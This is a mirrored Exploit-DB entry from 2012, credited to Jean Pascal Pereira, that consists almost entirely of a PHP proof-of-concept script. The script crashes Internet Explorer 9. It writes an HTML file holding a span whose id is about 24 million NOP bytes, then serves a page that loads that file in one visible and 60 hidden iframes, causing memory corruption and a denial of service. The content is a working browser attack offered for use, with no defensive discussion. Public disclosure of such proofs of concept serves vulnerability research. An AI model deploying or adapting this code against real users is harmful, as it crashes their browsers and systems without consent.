Microsoft Internet Explorer 9 – Memory Corruption Crash (PoC) - 体验盒子

作者： Jean Pascal Pereira

日期： 2012-11-01

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/22401/

<?php

/**********************************************************
 * Internet Explorer 9 Memory Corruption PoC Exploit*
 **********************************************************
 **
 * Successfully executed with IE9 version 9.0.8112.16421*
 **
 * Discovered by Jean Pascal Pereira <pereira@secbiz.de>*
 **
 **********************************************************/

set_time_limit(0);

ini_set('memory_limit', '300M'); 

if(!file_exists("junk.htm"))
{
$string = "<span id='";

for($i = 0; $i < 24117256; $i++)
{
$string .= "\x90";
}
$string .= "'></span>";

file_put_contents("junk.htm", $string);
}

print "View the sourcecode of the iframe below (right click -> view source): <br />\n";
print "<iframe style='width: 800px; height: 500px;' src='https://www.exploit-db.com/exploits/22401/junk.htm'>\n";

for($i = 0; $i < 60; $i++)
{
print "<iframe style='display:none' src='https://www.exploit-db.com/exploits/22401/junk.htm'>\n";
} 

/* http://0xffe4.org */

?>